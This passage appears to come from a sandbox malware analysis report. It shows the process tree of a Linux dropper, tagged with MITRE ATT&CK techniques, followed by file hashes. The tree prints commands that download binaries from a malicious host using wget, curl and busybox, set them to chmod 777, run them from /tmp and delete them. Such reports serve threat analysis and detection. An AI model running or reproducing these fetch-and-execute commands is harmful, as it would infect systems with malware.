- System Network Configuration Discovery
PID:940 -
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:941 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:942 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:943
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:944 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:947 -
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:948 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:949 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:950
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:951 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7